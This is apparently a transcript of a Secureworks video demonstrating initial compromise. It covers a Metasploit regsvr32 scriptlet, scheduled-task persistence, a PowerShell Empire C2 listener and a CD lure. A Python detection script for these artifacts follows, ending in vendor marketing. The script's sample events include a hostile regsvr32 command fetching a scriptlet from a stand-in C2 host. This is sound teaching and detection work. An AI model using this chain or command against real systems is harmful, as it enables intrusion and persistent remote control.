In this video, Trenton Ivey, Secureworks Offensive Researcher, Counter Threat Unit and Adversarial Security Testing, gives a demonstration of how an attacker would initially compromise a system by creating a command and control server using the Metasploit framework and PowerShell Empire.
We will begin by creating a command and control server using the Metasploit framework and PowerShell Empire. First we'll use Metasploit to serve a file that, when used with regsvr32, will execute a command of our choice on the target system. For now, we'll leave the command option blank and run the module as a background job.
Metasploit provides us with a command that, when run, will cause a target system to connect to our server and execute the command that we specified. We'll copy this command and use it to make a new command. This new command will create a scheduled task that regularly runs the regsvr32 command provided by Metasploit.
This acts as a simple form of persistence. We will create a malicious binary that will run this command in the background as soon as it is executed. This gives the ability to regularly send commands to our target system but it isn't very interactive so we'll use PowerShell Empire to get a more advanced shell.
In PowerShell Empire, we'll create a new listener that will wait for agents to connect to c2.example.com:8080. Next we'll create a launcher. Running this launcher, which is just a PowerShell script, will cause a target system to connect to our C2 and wait for further commands.
Finally, we'll set the PowerShell Empire launcher as our Metasploit command and then restart our server. In this scenario, we've sent our users a CD containing the malicious file. When they run the binary, it will prompt them and confirm that they are in fact an employee of ACME and that they have the appropriate authority to view the documents that the binary contains.
If they continue, it will provide them with a prompt that asks where they want to save the documents. Even further, if they run the extractor, it will extract a document that appears to be legitimate and is benign. However, as soon as the binary was run, our scheduled task command was executed.
As evidence, if we look at the task name we can see that the task to run is our regsvr32 command and it's set to run every five minutes. When the scheduled task runs our command, we can see Metasploit handling the request from the regsvr32 command. This will load our PowerShell command, which then should connect to PowerShell Empire, and we can see an agent coming back in.
We can now interact with the agent and run things like sysinfo. This will send a command to the target system to pull back additional information about the system. I can see here we're logged in on the CORP domain as the username of mbishop. We can see that it's a laptop with the username of mbishop. This is a good start.
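The chain shown in the demo leaves two distinct artifacts on the victim that a defender can key on: a process-creation event for regsvr32 pulling a scriptlet over HTTP, and a scheduled-task creation event (Security event ID 4698) whose action is regsvr32 and whose trigger repeats every few minutes. The following Python is an added example written from the detection side; it is not Secureworks' code or part of the video. The event records, the task XML and the `c2.example.com` scriptlet URL are constructed samples shaped loosely after Sysmon event ID 1 and Windows event ID 4698, and the `PLACEHOLDER.sct` filename stands in for whatever Metasploit actually served.

```python
"""Detection helpers for the regsvr32 + scheduled-task persistence pattern
described above (added example, not Secureworks' code)."""
import re
import xml.etree.ElementTree as ET

# Indicators of regsvr32 being used as a remote scriptlet loader rather than
# to register a local COM DLL: an /i: argument that is an http(s) URL, or
# the scriptlet host scrobj.dll appearing on the command line.
REGSVR32 = re.compile(r"\bregsvr32(\.exe)?\b", re.IGNORECASE)
REMOTE_SCRIPTLET = re.compile(r"/i:\s*https?://", re.IGNORECASE)
SCROBJ = re.compile(r"\bscrobj\.dll\b", re.IGNORECASE)

# Namespace used by Task Scheduler XML (the TaskContent field of event 4698).
TASK_NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}


def suspicious_regsvr32_cmdline(cmdline: str) -> bool:
    """True when a command line runs regsvr32 against a remote scriptlet."""
    if not REGSVR32.search(cmdline):
        return False
    return bool(REMOTE_SCRIPTLET.search(cmdline) or SCROBJ.search(cmdline))


def iso8601_minutes(interval):
    """Parse the PTnHnMnS duration subset Task Scheduler emits; None if unparseable."""
    m = re.fullmatch(r"PT(?:(\d+)H)?(?:(\d+)M)?(?:(\d+)S)?", interval or "")
    if not m or interval == "PT":
        return None
    h, mi, s = (int(x) if x else 0 for x in m.groups())
    return h * 60 + mi + s / 60


def analyze_task(task_xml: str) -> dict:
    """Inspect a 4698 TaskContent document: what it executes and how often."""
    root = ET.fromstring(task_xml)
    findings = {"runs_regsvr32": False, "remote_scriptlet": False, "interval_minutes": None}
    for exe in root.findall(".//t:Actions/t:Exec", TASK_NS):
        cmd = (exe.findtext("t:Command", default="", namespaces=TASK_NS) + " "
               + exe.findtext("t:Arguments", default="", namespaces=TASK_NS))
        if REGSVR32.search(cmd):
            findings["runs_regsvr32"] = True
            findings["remote_scriptlet"] = suspicious_regsvr32_cmdline(cmd)
    interval = root.findtext(".//t:Repetition/t:Interval", namespaces=TASK_NS)
    findings["interval_minutes"] = iso8601_minutes(interval)
    return findings


def triage_events(events):
    """Return (event, reason) pairs for records matching either indicator."""
    hits = []
    for ev in events:
        if ev["event_id"] == 1 and suspicious_regsvr32_cmdline(ev["command_line"]):
            hits.append((ev, "regsvr32 loading a remote scriptlet"))
        elif ev["event_id"] == 4698:
            f = analyze_task(ev["task_content"])
            # A scheduled task whose action is regsvr32 is rare in legitimate use;
            # a repeating trigger or a remote scriptlet makes it the demo's pattern.
            if f["runs_regsvr32"] and (f["remote_scriptlet"] or f["interval_minutes"] is not None):
                reason = "scheduled task runs regsvr32"
                if f["interval_minutes"] is not None:
                    reason += f" every {f['interval_minutes']:g} min"
                hits.append((ev, reason))
    return hits


# Constructed sample data; not real telemetry from the demo.
MALICIOUS_TASK_XML = """<Task xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers><TimeTrigger><Repetition><Interval>PT5M</Interval></Repetition>
    <StartBoundary>2020-01-01T00:00:00</StartBoundary></TimeTrigger></Triggers>
  <Actions><Exec><Command>regsvr32.exe</Command>
    <Arguments>/s /n /u /i:http://c2.example.com:8080/PLACEHOLDER.sct scrobj.dll</Arguments>
  </Exec></Actions>
</Task>"""

BENIGN_TASK_XML = """<Task xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers><CalendarTrigger><StartBoundary>2020-01-01T03:00:00</StartBoundary>
    <ScheduleByDay><DaysInterval>1</DaysInterval></ScheduleByDay></CalendarTrigger></Triggers>
  <Actions><Exec><Command>C:\\Windows\\System32\\cleanmgr.exe</Command>
    <Arguments>/autoclean</Arguments></Exec></Actions>
</Task>"""

SAMPLE_EVENTS = [
    {"event_id": 1, "user": r"CORP\mbishop",
     "command_line": r"regsvr32 /s /n /u /i:http://c2.example.com:8080/PLACEHOLDER.sct scrobj.dll"},
    {"event_id": 1, "user": r"CORP\installer",
     "command_line": r'regsvr32 /s "C:\Program Files\Vendor\vendor.dll"'},
    {"event_id": 4698, "user": r"CORP\mbishop", "task_name": r"\Updater",
     "task_content": MALICIOUS_TASK_XML},
    {"event_id": 4698, "user": "SYSTEM", "task_name": r"\Microsoft\Windows\DiskCleanup\SilentCleanup",
     "task_content": BENIGN_TASK_XML},
]

if __name__ == "__main__":
    for ev, reason in triage_events(SAMPLE_EVENTS):
        print(f"[{ev['event_id']}] {ev['user']}: {reason}")
```

The two benign records (a vendor installer registering a local DLL, and the built-in disk-cleanup task) are there to show the rules do not fire on ordinary regsvr32 or ordinary scheduled tasks; only the remote-scriptlet command line and the five-minute regsvr32 task are reported. In a real pipeline the same two checks would run over Sysmon process-creation and Security 4698 events rather than the constructed dictionaries used here.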
The old approaches to cybersecurity are no longer adequate. It’s time for something new. Layered defenses can create almost as many problems as they solve, and security teams struggle to keep up with the threat. What you need is context across all your layers of defense with the right people, processes, and technology working together in concert. That’s how Secureworks can help. Using 20+ years of industry knowledge, advanced analytics, industry-leading threat intelligence, and the network effect of more than 4,000 customer environments, we provide world-class cybersecurity solutions to customers around the globe. This unmatched experience empowers our customers to be Collectively Smarter. Exponentially Safer.™
Our Managed Detection and Response (MDR) solution is comprehensive, powered by our cloud-native software Red Cloak™ Threat Detection and Response that uses AI and machine learning to deliver better outcomes for your security operations. MDR unifies telemetry from your existing security technology to maximize visibility, reduce complexity, and enable you to move at the speed of the threat. Learn more about how Managed Detection and Response uses contextualized visibility to improve your organization’s security posture.